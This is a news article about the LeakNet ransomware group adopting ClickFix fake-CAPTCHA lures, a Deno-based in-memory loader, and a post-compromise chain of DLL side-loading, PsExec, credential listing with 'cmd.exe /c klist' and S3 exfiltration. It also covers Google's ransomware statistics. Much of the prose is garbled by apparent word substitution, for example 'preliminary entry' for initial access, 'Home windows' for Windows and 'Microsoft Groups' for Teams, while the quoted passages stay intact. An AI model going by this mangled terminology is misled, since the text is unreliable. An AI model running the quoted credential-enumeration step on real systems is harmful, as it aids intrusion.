The ransomware operation often known as LeakNet has adopted the ClickFix social engineering tactic delivered by compromised web sites as an preliminary entry technique.
Using ClickFix, the place customers are tricked into manually operating malicious instructions to deal with non-existent errors, is a departure from counting on conventional strategies for acquiring preliminary entry, comparable to by stolen credentials acquired from preliminary entry brokers (IABs), ReliaQuest mentioned in a technical report printed at present.
The second essential facet of those assaults is the usage of a staged command-and-control (C2) loader constructed on the Deno JavaScript runtime to execute malicious payloads instantly in reminiscence.
“The key takeaway here is that both entry paths lead to the same repeatable post-exploitation sequence every time,” the cybersecurity firm mentioned. “That gives defenders something concrete to work with: known behaviors you can detect and disrupt at each stage, well before ransomware deployment, regardless of how LeakNet got in.”
LeakNet first emerged in November 2024, describing itself as a “digital watchdog” and framing its actions as targeted on web freedom and transparency. In keeping with knowledge captured by Dragos, the group has additionally focused industrial entities.
Using ClickFix to breach victims affords a number of benefits, essentially the most vital being that it reduces dependence on third-party suppliers, lowers per-victim acquisition price, and removes the operational bottleneck of ready for beneficial accounts to hit the market.
In these assaults, the legitimate-but-compromised websites are used to serve pretend CAPTCHA verification checks that instruct customers to repeat and paste a “msiexec.exe” command to the Home windows Run dialog. The assaults aren’t confined to a particular business vertical, as an alternative casting a large web to contaminate as many victims as attainable.
The event comes as extra risk actors are adopting the ClickFix playbook, because it abuses trusted, on a regular basis workflows to entice customers into operating rogue instructions by way of reputable Home windows tooling in a way that feels routine and secure.
“LeakNet’s adoption of ClickFix marks both the first documented expansion of the group’s initial access capability and a meaningful strategic shift,” ReliaQuest mentioned.
“By moving away from IABs, LeakNet removes a dependency that naturally constrained how quickly and broadly it could operate. And because ClickFix is delivered through legitimate—but compromised—websites, it doesn’t present the same obvious signals at the network layer as attacker-owned infrastructure.”
In addition to the usage of ClickFix to provoke the assault chain, LeakNet is assessed to be utilizing a Deno-based loader to execute Base64-encoded JavaScript instantly in reminiscence in order to reduce on-disk proof and evade detection. The payload is designed to fingerprint the compromised system, contact an exterior server to fetch next-stage malware, and enter right into a polling loop that repeatedly fetches and executes extra code by Deno.
Individually, ReliaQuest mentioned it additionally noticed an intrusion try during which risk actors used Microsoft Groups-based phishing to socially engineer a consumer into launching a payload chain that resulted in an analogous Deno-based loader. Whereas the exercise stays unattributed, the usage of the convey your individual runtime (BYOR) method both indicators a broadening of LeakNet’s preliminary entry vectors, or that different risk actors have adopted the method.
LeakNet’s post-compromise exercise follows a constant methodology: it begins with the usage of DLL side-loading to launch a malicious DLL delivered by way of the loader, adopted by lateral motion utilizing PsExec, knowledge exfiltration, and encryption.
“LeakNet runs cmd.exe /c klist, a built-in Windows command that displays active authentication credentials on the compromised system. This tells the attacker which accounts and services are already reachable without the need for requesting new credentials, so they can move faster and more deliberately,” ReliaQuest mentioned.
“For staging and exfiltration, LeakNet uses S3 buckets, exploiting the appearance of normal cloud traffic to reduce its detection footprint.”
The event comes as Google revealed that Qilin (aka Agenda), Akira (aka RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (aka FireFlame and FuryStorm), and Sinobi emerged as the highest 10 ransomware manufacturers with essentially the most victims claimed on their knowledge leak websites.
“In a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls,” Google Menace Intelligence Group (GTIG) mentioned, including 77% of analyzed ransomware intrusions included suspected knowledge theft, a rise from 57% in 2024.
“Despite ongoing turmoil caused by actor conflicts and disruption, ransomware actors remain highly motivated and the extortion ecosystem demonstrates continued resilience. Several indicators suggest the overall profitability of these operations is, however, declining, and at least some threat actors are shifting their targeting calculus away from large companies to instead focus on higher volume attacks against smaller organizations.”
